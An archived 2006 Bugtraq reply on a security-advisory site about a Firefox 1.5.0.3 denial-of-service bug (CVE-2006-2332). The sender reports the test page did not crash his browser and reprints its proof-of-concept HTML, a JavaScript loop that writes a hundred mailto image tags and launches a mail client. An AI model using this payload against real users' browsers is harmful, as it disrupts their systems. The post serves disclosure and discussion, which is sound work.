Bug: Firefox 1.5.0.3 - DoS ( Ascii Version )

Search:
WLB2

Firefox 1.5.0.3 - DoS

Published
Credit
Risk
2006.05.12
p4 werterxyz gmail com</span> (1 replies)<div class="expanded
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-2332
Yes
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.6/10
2.9/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

p4.werterxyz (at) gmail (dot) com [email concealed] wrote:
> test2:
> http://werterxyz.altervista.org/test2.html
> http://geocities.com/werterxyz/test2.html

Did not crash FF 1.5.0.3 on Windows Server 2003 SP1 (slowed it down for
a few seconds and launched Outlook Express, but that's it). Here is the
code since the original poster didn't see fit to publish it.

<Head>
<Title>test2 by P4</Title>
</Head>

<Body>
<!-- following code added by server. PLEASE REMOVE -->
<!-- preceding code added by server. PLEASE REMOVE -->
<SCRIPT Language="Javascript">
for(i=0; i<100; i++){
document.write('<Img src="mailto:test (at) test (dot) com [email concealed]?subject=test
email&body=Sei fottuto!"> clicka col tasto destro del mouse e seleziona
"Mostra immagine" (View Image)')
}
</SCRIPT>
</Body>
<!-- text below generated by server. PLEASE REMOVE
-
--></object></layer></div></span></style></noscript></table></script>
</a
pplet><script
language="JavaScript"
src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script
language="JavaScript"
src="http://geocities.com/js_source/geov2.js"></script><script
language="javascript">geovisit();</script><noscript><img
src="http://visit.geocities.yahoo.com/visit.gif?us1147288798"
alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61"
ALT=1 WIDTH=1 HEIGHT=1>

>
> Saluti da P4

- --
Chris Horry KG4TSM "A conservative is a man with two perfectly
zerbey (at) wibble.co (dot) uk [email concealed] good legs who, however, has never learned how
http://www.wibble.co.uk to walk forward". -- Franklin D. Roosevelt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFEYj3pnAAeGCtMZU4RAuEAAJ92SdxcNR0ALLdqrC6/CgTOve8UXwCfRkgF
9DAmdMxX5LaboCYnYTtr4GM=
=z8eV
-----END PGP SIGNATURE-----

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version